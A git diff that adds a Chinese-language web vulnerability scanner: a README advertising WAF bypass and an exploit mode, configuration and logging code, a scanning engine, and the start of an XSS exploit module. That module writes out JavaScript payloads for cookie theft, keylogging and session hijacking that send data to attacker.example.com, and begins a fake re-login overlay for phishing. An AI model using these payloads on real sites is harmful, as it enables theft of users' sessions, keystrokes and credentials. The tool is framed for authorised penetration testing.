diff --git a/README.md b/README.md
index 440e107..69b40f0 100644
--- a/README.md
+++ b/README.md
@@ -1,2 +1,241 @@
-# XSS_Scanner
-这是一个全面的Web应用安全扫描工具，专注于检测XSS（跨站脚本）漏洞，同时也能够发现其他类型的Web安全漏洞。该工具支持多种扫描模式、不同级别的有效载荷和详细的漏洞报告。
+# 深度XSS漏洞扫描器
+
+这是一个全面的Web应用安全扫描工具，专注于检测XSS（跨站脚本）漏洞，同时也能够发现其他类型的Web安全漏洞。该工具支持多种扫描模式、不同级别的有效载荷和详细的漏洞报告。
+
+## 功能特点
+
+- **多种漏洞检测**：
+  - XSS（反射型、存储型、DOM型）
+  - CSRF（跨站请求伪造）
+  - SQL注入
+  - LFI（本地文件包含）
+  - RFI（远程文件包含）
+  - SSRF（服务器端请求伪造）
+  - XXE（XML外部实体注入）
+
+- **全面的扫描能力**：
+  - 网站爬虫功能，自动发现可测试的URL
+  - 表单和参数自动检测
+  - 支持DOM分析
+  - 支持不同测试级别（快速、标准、深度）
+  - 支持多线程扫描
+
+- **网页技术识别**：
+  - 自动识别目标网站使用的编程语言（PHP、ASP.NET、Java、Python等）
+  - 检测前端框架（React、Vue、Angular、jQuery等）
+  - 识别Web服务器类型（Apache、Nginx、IIS等）
+  - 识别CMS系统（WordPress、Joomla、Drupal等）
+  - 框架版本指纹识别
+
+- **高级WAF绕过功能**：
+  - 自动检测目标是否启用Web应用防火墙(WAF)
+  - 识别WAF类型（如Cloudflare、ModSecurity、AWS WAF等）
+  - 自动调整有效载荷以绕过WAF检测
+  - 多种绕过技术（编码变异、分段注入、定时执行等）
+  - 自适应绕过策略，根据WAF反应调整攻击向量
+
+- **高级功能**：
+  - 有效载荷自动绕过WAF
+  - 支持自定义有效载荷
+  - 基于浏览器的漏洞验证
+  - 支持漏洞利用
+  - 支持代理和认证
+
+- **详细报告**：
+  - 多种报告格式（HTML、JSON、XML、TXT）
+  - 详细的漏洞信息和修复建议
+  - 风险评级
+  - 网站技术栈分析报告
+
+## 安装
+
+### 要求
+- Python 3.7+
+- Chrome浏览器（如需浏览器测试）
+
+### 安装步骤
+
+1. 克隆仓库：
+```bash
+git clone https://github.com/yourusername/xss-scanner.git
+cd xss-scanner
+```
+
+2. 安装依赖：
+```bash
+pip install -r requirements.txt
+```
+
+3. 安装ChromeDriver（如需浏览器测试）：
+```bash
+# Windows使用以下命令：
+pip install webdriver-manager
+
+# Linux可能需要安装Chrome：
+# sudo apt-get install google-chrome-stable
+```
+
+## 使用方法
+
+### 基本用法
+
+```bash
+python main.py -u https://example.com
+```
+
+### 更多示例
+
+**扫描单个URL**：
+```bash
+python main.py -u https://example.com
+```
+
+**扫描多个URL**：
+```bash
+python main.py -f targets.txt
+```
+
+**深度扫描**：
+```bash
+python main.py -u https://example.com --scan-level 3
+```
+
+**只扫描XSS漏洞**：
+```bash
+python main.py -u https://example.com --scan-type xss
+```
+
+**使用浏览器进行DOM XSS检测**：
+```bash
+python main.py -u https://example.com --browser
+```
+
+**利用发现的漏洞**：
+```bash
+python main.py -u https://example.com --exploit
+```
+
+**生成HTML报告**：
+```bash
+python main.py -u https://example.com -o report.html --format html
+```
+
+**使用代理**：
+```bash
+python main.py -u https://example.com --proxy http://127.0.0.1:8080
+```
+
+### 命令行参数
+
+```
+必选参数:
+  -u, --url URL              目标URL
+  -f, --file FILE            包含目标URL的文件
+
+可选参数:
+  -d, --depth DEPTH          爬虫深度 (默认: 2)
+  -t, --threads THREADS      线程数 (默认: 5)
+  --timeout TIMEOUT          请求超时时间 (默认: 10秒)
+  --user-agent USER_AGENT    自定义User-Agent
+  --cookie COOKIE            请求Cookie
+  --headers HEADERS          自定义HTTP头
+  --proxy PROXY              HTTP代理
+  --scan-level {1,2,3}       扫描级别: 1-快速, 2-标准, 3-深度 (默认: 2)
+  --scan-type {all,xss,csrf,sqli,lfi,rfi,ssrf,xxe}
+                             扫描类型 (默认: all)
+  --payload-level {1,2,3}    Payload复杂度: 1-基础, 2-标准, 3-高级 (默认: 2)
+  -o, --output OUTPUT        输出报告文件
+  --format {txt,html,json,xml}
+                             报告格式 (默认: html)
+  -v, --verbose              显示详细输出
+  --no-color                 禁用彩色输出
+
+高级选项:
+  --browser                  使用真实浏览器进行扫描
+  --exploit                  尝试利用发现的漏洞
+  --custom-payloads FILE     自定义Payload文件
+  --exclude REGEX            排除URL模式 (正则表达式)
+  --include REGEX            仅包含URL模式 (正则表达式)
+  --auth USER:PASS           基本认证
+```
+
+## XSS漏洞案例
+
+扫描器能够检测以下XSS攻击场景：
+
+1. **网页留言板获取cookie**：检测表单提交中的XSS漏洞，可能导致cookie泄露
+2. **CMS管理后台伪造钓鱼网站**：检测URL参数中的XSS漏洞，可能用于伪造管理界面
+3. **图片处XSS攻击**：检测图片参数和属性中的XSS漏洞
+4. **SVG-XSS**：检测SVG文件中的XML注入和XSS漏洞
+5. **PDF-XSS**：检测PDF参数中的XSS漏洞
+6. **浏览器翻译-XSS**：检测浏览器翻译功能中的XSS漏洞
+7. **Flash-XSS**：检测Flash参数中的XSS漏洞
+8. **XSS配合MSf钓鱼**：检测可能用于钓鱼的XSS漏洞
+9. **XSS漏洞配合CSRF漏洞**：检测可能与CSRF组合的XSS漏洞
+10. **XSS漏洞配合越权漏洞**：检测可能导致权限提升的XSS漏洞
+
+## 进阶用法
+
+### 自定义有效载荷
+
+创建一个文本文件，每行包含一个XSS有效载荷，然后使用`--custom-payloads`参数：
+
+```bash
+python main.py -u https://example.com --custom-payloads my_payloads.txt
+```
+
+### 漏洞利用
+
+使用`--exploit`参数启用漏洞利用功能：
+
+```bash
+python main.py -u https://example.com --exploit
+```
+
+当发现漏洞时，扫描器将尝试进一步利用该漏洞，例如：
+- XSS漏洞：尝试窃取cookie或会话信息
+- SQL注入：尝试提取数据库信息
+- 文件包含：尝试读取敏感文件
+
+### 限制扫描范围
+
+使用正则表达式包含或排除特定URL：
+
+```bash
+# 只扫描/admin/路径下的URL
+python main.py -u https://example.com --include "^https://example.com/admin/.*"
+
+# 排除静态资源
+python main.py -u https://example.com --exclude "\.(jpg|css|js|png|gif)$"
+```
+
+## 安全和免责声明
+
+此工具仅供安全研究和授权渗透测试使用。未经明确许可，对系统进行扫描可能违反法律。使用者需要：
+
+1. 只在自己拥有的系统上或获得明确授权的系统上使用
+2. 了解并遵守当地的网络安全法律和规定
+3. 负责任地披露发现的安全漏洞
+
+## 贡献
+
+欢迎贡献代码、报告bug或提出功能建议。请通过以下方式参与：
+
+1. Fork仓库
+2. 创建功能分支 (`git checkout -b feature/amazing-feature`)
+3. 提交更改 (`git commit -m 'Add some amazing feature'`)
+4. 推送到分支 (`git push origin feature/amazing-feature`)
+5. 创建Pull Request
+
+## 许可证
+
+本项目采用MIT许可证 - 详情请查看[LICENSE](LICENSE)文件。
+
+## 联系方式
+
+- 项目链接: [https://github.com/yourusername/xss-scanner](https://github.com/yourusername/xss-scanner)
+- 联系邮箱: [1013199991@qq.com](1013199991@qq.com)
+
+---
+
+**注意**：此工具是为安全专业人员设计的，使用前请确保遵守所有适用的法律和法规。 
\ No newline at end of file
diff --git a/xss_scanner.py b/xss_scanner.py
new file mode 100644
index 0000000..a07c48e
--- /dev/null
+++ b/xss_scanner.py
@@ -0,0 +1,19 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XSS深度漏洞扫描器 - 主入口脚本
+"""
+
+import os
+import sys
+
+# 添加当前目录到Python路径
+sys.path.append(os.path.dirname(os.path.abspath(__file__)))
+
+# 导入主模块
+from xss_scanner.main import main
+
+if __name__ == "__main__":
+    # 调用主函数
+    main() 
\ No newline at end of file
diff --git a/xss_scanner/__init__.py b/xss_scanner/__init__.py
new file mode 100644
index 0000000..c060e15
--- /dev/null
+++ b/xss_scanner/__init__.py
@@ -0,0 +1,10 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XSS深度漏洞扫描器 - 包初始化
+"""
+
+__version__ = '1.0.0'
+__author__ = '高级渗透工程师'
+__description__ = '一个全面的Web应用安全扫描工具，专注于检测XSS漏洞，同时也能够发现其他类型的Web安全漏洞。' 
\ No newline at end of file
diff --git a/xss_scanner/__pycache__/__init__.cpython-313.pyc b/xss_scanner/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000..0890bf8
Binary files /dev/null and b/xss_scanner/__pycache__/__init__.cpython-313.pyc differ
diff --git a/xss_scanner/__pycache__/main.cpython-313.pyc b/xss_scanner/__pycache__/main.cpython-313.pyc
new file mode 100644
index 0000000..996fc90
Binary files /dev/null and b/xss_scanner/__pycache__/main.cpython-313.pyc differ
diff --git a/xss_scanner/core/__init__.py b/xss_scanner/core/__init__.py
new file mode 100644
index 0000000..7c9de28
--- /dev/null
+++ b/xss_scanner/core/__init__.py
@@ -0,0 +1 @@
+"""XSS扫描器 - 核心包""" 
\ No newline at end of file
diff --git a/xss_scanner/core/__pycache__/__init__.cpython-313.pyc b/xss_scanner/core/__pycache__/__init__.cpython-313.pyc
new file mode 100644
index 0000000..4bb5f77
Binary files /dev/null and b/xss_scanner/core/__pycache__/__init__.cpython-313.pyc differ
diff --git a/xss_scanner/core/__pycache__/config.cpython-313.pyc b/xss_scanner/core/__pycache__/config.cpython-313.pyc
new file mode 100644
index 0000000..534e84c
Binary files /dev/null and b/xss_scanner/core/__pycache__/config.cpython-313.pyc differ
diff --git a/xss_scanner/core/__pycache__/logger.cpython-313.pyc b/xss_scanner/core/__pycache__/logger.cpython-313.pyc
new file mode 100644
index 0000000..429047f
Binary files /dev/null and b/xss_scanner/core/__pycache__/logger.cpython-313.pyc differ
diff --git a/xss_scanner/core/__pycache__/scanner_engine.cpython-313.pyc b/xss_scanner/core/__pycache__/scanner_engine.cpython-313.pyc
new file mode 100644
index 0000000..a7e930f
Binary files /dev/null and b/xss_scanner/core/__pycache__/scanner_engine.cpython-313.pyc differ
diff --git a/xss_scanner/core/config.py b/xss_scanner/core/config.py
new file mode 100644
index 0000000..7981899
--- /dev/null
+++ b/xss_scanner/core/config.py
@@ -0,0 +1,319 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+配置模块，负责管理扫描器的配置参数
+"""
+
+import os
+import json
+import logging
+from urllib.parse import urlparse
+
+logger = logging.getLogger('xss_scanner')
+
+class Config:
+    """配置类，管理扫描器的所有配置选项"""
+    
+    def __init__(self):
+        """初始化默认配置"""
+        # 常规选项
+        self.url = None
+        self.depth = 2
+        self.threads = 5
+        self.timeout = 10
+        self.user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36"
+        self.cookies = {}
+        self.headers = {}
+        self.proxy = None
+        self.scan_level = 2
+        self.scan_type = 'all'
+        self.payload_level = 2
+        self.output_file = None
+        self.output_format = 'html'
+        self.verbose = False
+        self.no_color = False
+        
+        # 高级选项
+        self.use_browser = False
+        self.exploit = False
+        self.custom_payloads = None
+        self.exclude_pattern = None
+        self.include_pattern = None
+        self.auth = None
+        
+        # 内部使用
+        self.base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
+        self.payloads_dir = os.path.join(self.base_dir, 'payloads')
+    
+    def load_from_args(self, args):
+        """
+        从命令行参数加载配置
+        
+        Args:
+            args: 解析后的命令行参数
+        """
+        # 常规选项
+        if args.url:
+            self.url = args.url
+            
+        if args.depth:
+            self.depth = args.depth
+            
+        if args.threads:
+            self.threads = args.threads
+            
+        if args.timeout:
+            self.timeout = args.timeout
+            
+        if args.user_agent:
+            self.user_agent = args.user_agent
+            
+        if args.cookie:
+            self._parse_cookies(args.cookie)
+            
+        if args.headers:
+            self._parse_headers(args.headers)
+            
+        if args.proxy:
+            self.proxy = args.proxy
+            
+        if args.scan_level:
+            self.scan_level = args.scan_level
+            
+        if args.scan_type:
+            self.scan_type = args.scan_type
+            
+        if args.payload_level:
+            self.payload_level = args.payload_level
+            
+        if args.output:
+            self.output_file = args.output
+            
+        if args.format:
+            self.output_format = args.format
+            
+        self.verbose = args.verbose
+        self.no_color = args.no_color
+        
+        # 高级选项
+        self.use_browser = args.browser if hasattr(args, 'browser') else False
+        self.exploit = args.exploit if hasattr(args, 'exploit') else False
+        
+        if hasattr(args, 'custom_payloads') and args.custom_payloads:
+            self.custom_payloads = args.custom_payloads
+            
+        if hasattr(args, 'exclude') and args.exclude:
+            self.exclude_pattern = args.exclude
+            
+        if hasattr(args, 'include') and args.include:
+            self.include_pattern = args.include
+            
+        if hasattr(args, 'auth') and args.auth:
+            self._parse_auth(args.auth)
+    
+    def load_from_file(self, config_file):
+        """
+        从配置文件加载配置
+        
+        Args:
+            config_file: 配置文件路径
+        """
+        if not os.path.exists(config_file):
+            logger.error(f"配置文件不存在: {config_file}")
+            return False
+            
+        try:
+            with open(config_file, 'r') as f:
+                config_data = json.load(f)
+                
+            # 常规选项
+            if 'url' in config_data:
+                self.url = config_data['url']
+                
+            if 'depth' in config_data:
+                self.depth = config_data['depth']
+                
+            if 'threads' in config_data:
+                self.threads = config_data['threads']
+                
+            if 'timeout' in config_data:
+                self.timeout = config_data['timeout']
+                
+            if 'user_agent' in config_data:
+                self.user_agent = config_data['user_agent']
+                
+            if 'cookies' in config_data:
+                self.cookies = config_data['cookies']
+                
+            if 'headers' in config_data:
+                self.headers = config_data['headers']
+                
+            if 'proxy' in config_data:
+                self.proxy = config_data['proxy']
+                
+            if 'scan_level' in config_data:
+                self.scan_level = config_data['scan_level']
+                
+            if 'scan_type' in config_data:
+                self.scan_type = config_data['scan_type']
+                
+            if 'payload_level' in config_data:
+                self.payload_level = config_data['payload_level']
+                
+            if 'output_file' in config_data:
+                self.output_file = config_data['output_file']
+                
+            if 'output_format' in config_data:
+                self.output_format = config_data['output_format']
+                
+            if 'verbose' in config_data:
+                self.verbose = config_data['verbose']
+                
+            if 'no_color' in config_data:
+                self.no_color = config_data['no_color']
+                
+            # 高级选项
+            if 'use_browser' in config_data:
+                self.use_browser = config_data['use_browser']
+                
+            if 'exploit' in config_data:
+                self.exploit = config_data['exploit']
+                
+            if 'custom_payloads' in config_data:
+                self.custom_payloads = config_data['custom_payloads']
+                
+            if 'exclude_pattern' in config_data:
+                self.exclude_pattern = config_data['exclude_pattern']
+                
+            if 'include_pattern' in config_data:
+                self.include_pattern = config_data['include_pattern']
+                
+            if 'auth' in config_data:
+                self.auth = config_data['auth']
+                
+            return True
+        except Exception as e:
+            logger.error(f"加载配置文件失败: {str(e)}")
+            return False
+    
+    def save_to_file(self, config_file):
+        """
+        保存配置到文件
+        
+        Args:
+            config_file: 配置文件路径
+        """
+        config_data = {
+            'url': self.url,
+            'depth': self.depth,
+            'threads': self.threads,
+            'timeout': self.timeout,
+            'user_agent': self.user_agent,
+            'cookies': self.cookies,
+            'headers': self.headers,
+            'proxy': self.proxy,
+            'scan_level': self.scan_level,
+            'scan_type': self.scan_type,
+            'payload_level': self.payload_level,
+            'output_file': self.output_file,
+            'output_format': self.output_format,
+            'verbose': self.verbose,
+            'no_color': self.no_color,
+            'use_browser': self.use_browser,
+            'exploit': self.exploit,
+            'custom_payloads': self.custom_payloads,
+            'exclude_pattern': self.exclude_pattern,
+            'include_pattern': self.include_pattern,
+            'auth': self.auth
+        }
+        
+        try:
+            with open(config_file, 'w') as f:
+                json.dump(config_data, f, indent=4)
+            return True
+        except Exception as e:
+            logger.error(f"保存配置文件失败: {str(e)}")
+            return False
+    
+    def _parse_cookies(self, cookie_str):
+        """
+        解析Cookie字符串
+        
+        Args:
+            cookie_str: Cookie字符串，格式：name1=value1; name2=value2
+        """
+        if not cookie_str:
+            return
+            
+        try:
+            self.cookies = {}
+            for cookie in cookie_str.split(';'):
+                if '=' in cookie:
+                    name, value = cookie.strip().split('=', 1)
+                    self.cookies[name] = value
+        except Exception as e:
+            logger.error(f"解析Cookie失败: {str(e)}")
+    
+    def _parse_headers(self, headers_str):
+        """
+        解析HTTP头字符串
+        
+        Args:
+            headers_str: HTTP头字符串，格式：Header1:Value1;Header2:Value2
+        """
+        if not headers_str:
+            return
+            
+        try:
+            self.headers = {}
+            for header in headers_str.split(';'):
+                if ':' in header:
+                    name, value = header.strip().split(':', 1)
+                    self.headers[name] = value
+        except Exception as e:
+            logger.error(f"解析HTTP头失败: {str(e)}")
+    
+    def _parse_auth(self, auth_str):
+        """
+        解析基本认证字符串
+        
+        Args:
+            auth_str: 基本认证字符串，格式：username:password
+        """
+        if not auth_str:
+            return
+            
+        try:
+            if ':' in auth_str:
+                username, password = auth_str.split(':', 1)
+                self.auth = {
+                    'username': username,
+                    'password': password
+                }
+        except Exception as e:
+            logger.error(f"解析基本认证失败: {str(e)}")
+    
+    def get_payloads_file(self, payload_type):
+        """
+        获取指定类型的Payload文件路径
+        
+        Args:
+            payload_type: Payload类型，如xss、sqli等
+            
+        Returns:
+            str: Payload文件路径
+        """
+        # 如果指定了自定义Payload文件，则使用自定义文件
+        if self.custom_payloads and os.path.exists(self.custom_payloads):
+            return self.custom_payloads
+            
+        # 使用默认的Payload文件
+        payload_file = f"{payload_type}_level{self.payload_level}.txt"
+        payload_path = os.path.join(self.payloads_dir, payload_type, payload_file)
+        
+        if not os.path.exists(payload_path):
+            logger.warning(f"Payload文件不存在: {payload_path}，使用默认Payload文件")
+            payload_path = os.path.join(self.payloads_dir, payload_type, f"{payload_type}_level1.txt")
+            
+        return payload_path 
\ No newline at end of file
diff --git a/xss_scanner/core/logger.py b/xss_scanner/core/logger.py
new file mode 100644
index 0000000..cbc6f2c
--- /dev/null
+++ b/xss_scanner/core/logger.py
@@ -0,0 +1,138 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+日志模块，负责管理日志输出
+"""
+
+import os
+import logging
+import sys
+from datetime import datetime
+
+class ColoredFormatter(logging.Formatter):
+    """彩色日志格式化器"""
+    
+    # 定义颜色代码
+    COLORS = {
+        'DEBUG': '\033[94m',  # 蓝色
+        'INFO': '\033[92m',   # 绿色
+        'WARNING': '\033[93m', # 黄色
+        'ERROR': '\033[91m',  # 红色
+        'CRITICAL': '\033[91m\033[1m', # 红色加粗
+        'RESET': '\033[0m'    # 重置
+    }
+    
+    def __init__(self, fmt=None, datefmt=None, style='%', use_color=True):
+        """
+        初始化格式化器
+        
+        Args:
+            fmt: 日志格式
+            datefmt: 日期格式
+            style: 格式风格
+            use_color: 是否使用彩色输出
+        """
+        super().__init__(fmt, datefmt, style)
+        self.use_color = use_color and sys.platform != 'win32' or os.name == 'posix'
+    
+    def format(self, record):
+        """
+        格式化日志记录
+        
+        Args:
+            record: 日志记录
+            
+        Returns:
+            str: 格式化后的日志
+        """
+        levelname = record.levelname
+        
+        # 使用原始格式化方法格式化日志
+        message = super().format(record)
+        
+        # 如果启用了彩色输出，则添加颜色
+        if self.use_color and levelname in self.COLORS:
+            message = f"{self.COLORS[levelname]}{message}{self.COLORS['RESET']}"
+        
+        return message
+
+
+def setup_logger(log_level=logging.INFO, no_color=False):
+    """
+    设置日志系统
+    
+    Args:
+        log_level: 日志级别
+        no_color: 是否禁用彩色输出
+        
+    Returns:
+        logging.Logger: 日志记录器
+    """
+    # 创建日志记录器
+    logger = logging.getLogger('xss_scanner')
+    logger.setLevel(log_level)
+    
+    # 清除之前的处理器
+    for handler in logger.handlers:
+        logger.removeHandler(handler)
+    
+    # 创建控制台处理器
+    console_handler = logging.StreamHandler()
+    console_handler.setLevel(log_level)
+    
+    # 设置日志格式
+    log_format = '[%(asctime)s] [%(levelname)s] %(message)s'
+    date_format = '%Y-%m-%d %H:%M:%S'
+    
+    # 创建格式化器
+    formatter = ColoredFormatter(
+        fmt=log_format,
+        datefmt=date_format,
+        use_color=not no_color
+    )
+    
+    # 设置处理器的格式化器
+    console_handler.setFormatter(formatter)
+    
+    # 将处理器添加到记录器
+    logger.addHandler(console_handler)
+    
+    return logger
+
+
+def setup_file_logger(log_file, log_level=logging.INFO):
+    """
+    设置文件日志
+    
+    Args:
+        log_file: 日志文件路径
+        log_level: 日志级别
+        
+    Returns:
+        logging.Logger: 日志记录器
+    """
+    # 创建日志记录器
+    logger = logging.getLogger('xss_scanner')
+    
+    # 创建文件处理器
+    try:
+        file_handler = logging.FileHandler(log_file, encoding='utf-8')
+        file_handler.setLevel(log_level)
+        
+        # 设置日志格式
+        log_format = '[%(asctime)s] [%(levelname)s] %(message)s'
+        date_format = '%Y-%m-%d %H:%M:%S'
+        
+        # 创建格式化器
+        formatter = logging.Formatter(fmt=log_format, datefmt=date_format)
+        
+        # 设置处理器的格式化器
+        file_handler.setFormatter(formatter)
+        
+        # 将处理器添加到记录器
+        logger.addHandler(file_handler)
+    except Exception as e:
+        logger.error(f"设置文件日志失败: {str(e)}")
+    
+    return logger 
\ No newline at end of file
diff --git a/xss_scanner/core/scanner_engine.py b/xss_scanner/core/scanner_engine.py
new file mode 100644
index 0000000..b77077c
--- /dev/null
+++ b/xss_scanner/core/scanner_engine.py
@@ -0,0 +1,239 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+扫描引擎核心模块
+负责协调各种类型的扫描器和管理扫描过程
+"""
+
+import time
+import logging
+import threading
+import queue
+from concurrent.futures import ThreadPoolExecutor
+from urllib.parse import urlparse, urljoin
+
+from xss_scanner.utils.crawler import Crawler
+from xss_scanner.utils.http_client import HttpClient
+from xss_scanner.scanners.xss_scanner import XSSScanner
+from xss_scanner.scanners.csrf_scanner import CSRFScanner
+from xss_scanner.scanners.sql_injection_scanner import SQLInjectionScanner
+from xss_scanner.scanners.lfi_scanner import LFIScanner
+from xss_scanner.scanners.rfi_scanner import RFIScanner
+from xss_scanner.scanners.ssrf_scanner import SSRFScanner
+from xss_scanner.scanners.xxe_scanner import XXEScanner
+
+logger = logging.getLogger('xss_scanner')
+
+class ScannerEngine:
+    """扫描引擎核心类，负责协调不同类型的扫描器"""
+    
+    def __init__(self, config):
+        """
+        初始化扫描引擎
+        
+        Args:
+            config: 配置对象，包含扫描参数
+        """
+        self.config = config
+        self.http_client = HttpClient(
+            timeout=config.timeout,
+            user_agent=config.user_agent,
+            proxy=config.proxy,
+            cookies=config.cookies,
+            headers=config.headers
+        )
+        self.crawler = Crawler(
+            http_client=self.http_client,
+            max_depth=config.depth,
+            threads=config.threads,
+            exclude_pattern=config.exclude_pattern,
+            include_pattern=config.include_pattern
+        )
+        
+        # 初始化各种扫描器
+        self.scanners = []
+        self.initialize_scanners()
+        
+        # 线程池
+        self.thread_pool = ThreadPoolExecutor(max_workers=config.threads)
+        
+        # 存储扫描结果
+        self.results = {
+            'target': None,
+            'start_time': None,
+            'end_time': None,
+            'scan_info': {
+                'scan_level': config.scan_level,
+                'scan_type': config.scan_type,
+                'threads': config.threads,
+                'depth': config.depth
+            },
+            'vulnerabilities': [],
+            'statistics': {
+                'pages_scanned': 0,
+                'forms_tested': 0,
+                'parameters_tested': 0,
+                'vulnerabilities_found': 0
+            }
+        }
+    
+    def initialize_scanners(self):
+        """初始化所有扫描器"""
+        # 添加XSS扫描器
+        self.scanners.append(XSSScanner(
+            http_client=self.http_client,
+            payload_level=self.config.payload_level,
+            use_browser=self.config.use_browser
+        ))
+        
+        # 根据配置添加其他类型的扫描器
+        if self.config.scan_type in ['all', 'csrf']:
+            self.scanners.append(CSRFScanner(self.http_client))
+            
+        if self.config.scan_type in ['all', 'sqli']:
+            self.scanners.append(SQLInjectionScanner(self.http_client))
+            
+        if self.config.scan_type in ['all', 'lfi']:
+            self.scanners.append(LFIScanner(self.http_client))
+            
+        if self.config.scan_type in ['all', 'rfi']:
+            self.scanners.append(RFIScanner(self.http_client))
+            
+        if self.config.scan_type in ['all', 'ssrf']:
+            self.scanners.append(SSRFScanner(self.http_client))
+            
+        if self.config.scan_type in ['all', 'xxe']:
+            self.scanners.append(XXEScanner(self.http_client))
+    
+    def scan(self, target_url):
+        """
+        对目标进行扫描
+        
+        Args:
+            target_url: 目标URL
+            
+        Returns:
+            dict: 扫描结果
+        """
+        self.results['target'] = target_url
+        self.results['start_time'] = time.time()
+        
+        # 爬取目标站点
+        logger.info(f"开始爬取目标站点: {target_url}")
+        pages = self.crawler.crawl(target_url)
+        self.results['statistics']['pages_scanned'] = len(pages)
+        logger.info(f"爬取完成，发现 {len(pages)} 个页面")
+        
+        # 对每个页面进行扫描
+        for page in pages:
+            logger.debug(f"扫描页面: {page['url']}")
+            
+            # 对页面中的表单进行测试
+            for form in page.get('forms', []):
+                self.results['statistics']['forms_tested'] += 1
+                self._scan_form(page['url'], form)
+            
+            # 对URL参数进行测试
+            if page.get('params', []):
+                self._scan_params(page['url'], page['params'])
+                self.results['statistics']['parameters_tested'] += len(page['params'])
+        
+        # 如果配置了漏洞利用，则尝试利用发现的漏洞
+        if self.config.exploit and self.results['vulnerabilities']:
+            self._exploit_vulnerabilities()
+        
+        self.results['end_time'] = time.time()
+        self.results['statistics']['vulnerabilities_found'] = len(self.results['vulnerabilities'])
+        
+        return self.results
+    
+    def _scan_form(self, url, form):
+        """
+        扫描表单
+        
+        Args:
+            url: 页面URL
+            form: 表单信息
+        """
+        logger.debug(f"扫描表单: {form.get('id', 'unknown')}")
+        
+        # 对表单中的每个输入字段进行测试
+        for field in form.get('fields', []):
+            if field['type'] in ['text', 'search', 'url', 'email', 'password', 'tel', 'number']:
+                for scanner in self.scanners:
+                    # 跳过不适用于表单的扫描器
+                    if not scanner.can_scan_form():
+                        continue
+                        
+                    result = scanner.scan_form(url, form, field)
+                    if result:
+                        self.results['vulnerabilities'].append(result)
+                        logger.warning(f"在表单中发现漏洞: {result['type']} - {result['description']}")
+    
+    def _scan_params(self, url, params):
+        """
+        扫描URL参数
+        
+        Args:
+            url: 页面URL
+            params: URL参数列表
+        """
+        logger.debug(f"扫描URL参数: {', '.join(params)}")
+        
+        for param in params:
+            for scanner in self.scanners:
+                # 跳过不适用于URL参数的扫描器
+                if not scanner.can_scan_params():
+                    continue
+                    
+                result = scanner.scan_parameter(url, param)
+                if result:
+                    self.results['vulnerabilities'].append(result)
+                    logger.warning(f"在URL参数中发现漏洞: {result['type']} - {result['description']}")
+    
+    def _exploit_vulnerabilities(self):
+        """尝试利用发现的漏洞"""
+        logger.info("尝试利用发现的漏洞...")
+        
+        for vuln in self.results['vulnerabilities']:
+            # 根据漏洞类型选择合适的利用模块
+            exploit_module = self._get_exploit_module(vuln['type'])
+            if exploit_module:
+                exploit_result = exploit_module.exploit(vuln)
+                if exploit_result:
+                    vuln['exploit_result'] = exploit_result
+                    logger.warning(f"成功利用漏洞: {vuln['type']} - {exploit_result['description']}")
+    
+    def _get_exploit_module(self, vuln_type):
+        """
+        根据漏洞类型获取对应的利用模块
+        
+        Args:
+            vuln_type: 漏洞类型
+            
+        Returns:
+            对应的利用模块实例
+        """
+        if vuln_type == 'XSS':
+            from xss_scanner.exploits.xss_exploit import XSSExploit
+            return XSSExploit(self.http_client)
+        elif vuln_type == 'CSRF':
+            from xss_scanner.exploits.csrf_exploit import CSRFExploit
+            return CSRFExploit(self.http_client)
+        elif vuln_type == 'SQL_INJECTION':
+            from xss_scanner.exploits.sqli_exploit import SQLInjectionExploit
+            return SQLInjectionExploit(self.http_client)
+        elif vuln_type == 'LFI':
+            from xss_scanner.exploits.lfi_exploit import LFIExploit
+            return LFIExploit(self.http_client)
+        elif vuln_type == 'RFI':
+            from xss_scanner.exploits.rfi_exploit import RFIExploit
+            return RFIExploit(self.http_client)
+        elif vuln_type == 'SSRF':
+            from xss_scanner.exploits.ssrf_exploit import SSRFExploit
+            return SSRFExploit(self.http_client)
+        elif vuln_type == 'XXE':
+            from xss_scanner.exploits.xxe_exploit import XXEExploit
+            return XXEExploit(self.http_client)
+        return None 
\ No newline at end of file
diff --git a/xss_scanner/exploits/xss_exploit.py b/xss_scanner/exploits/xss_exploit.py
new file mode 100644
index 0000000..9921193
--- /dev/null
+++ b/xss_scanner/exploits/xss_exploit.py
@@ -0,0 +1,248 @@
+#!/usr/bin/env python
+# -*- coding: utf-8 -*-
+
+"""
+XSS漏洞利用模块，负责利用发现的XSS漏洞
+"""
+
+import logging
+import random
+import string
+import base64
+from urllib.parse import urlencode, urlparse, parse_qsl
+
+logger = logging.getLogger('xss_scanner')
+
+class XSSExploit:
+    """XSS漏洞利用类，负责利用XSS漏洞执行特定操作"""
+    
+    def __init__(self, http_client):
+        """
+        初始化XSS漏洞利用模块
+        
+        Args:
+            http_client: HTTP客户端对象
+        """
+        self.http_client = http_client
+        self.exploit_id = self._generate_random_string(8)
+        
+        # 常用的XSS利用载荷
+        self.cookie_steal_payload = f"""<script>
+new Image().src="http://attacker.example.com/steal.php?cookie="+encodeURIComponent(document.cookie)+"&location="+encodeURIComponent(window.location)+"&id={self.exploit_id}";
+</script>"""
+
+        self.keylogger_payload = f"""<script>
+document.addEventListener('keydown', function(e) {{
+    var xhr = new XMLHttpRequest();
+    xhr.open('GET', 'http://attacker.example.com/log.php?key='+e.key+'&id={self.exploit_id}', true);
+    xhr.send();
+}});
+</script>"""
+
+        self.session_hijack_payload = f"""<script>
+var xhr = new XMLHttpRequest();
+xhr.open('GET', '/profile', true);
+xhr.onload = function() {{
+    var content = this.responseText;
+    var xhr2 = new XMLHttpRequest();
+    xhr2.open('GET', 'http://attacker.example.com/steal.php?data='+encodeURIComponent(content)+'&id={self.exploit_id}', true);
+    xhr2.send();
+}};
+xhr.send();
+</script>"""
+
+        self.phishing_payload = f"""<div style="position:fixed;top:0;left:0;width:100%;height:100%;background-color:white;z-index:9999;">
+<h2 style="text-align:center;margin-top:20px;">您的会话已过期</h2>
+<p style="text-align:center;">请重新登录以继续</p>
+<form style="width:300px;margin:0 auto;" onsubmit="sendCredentials(event)">
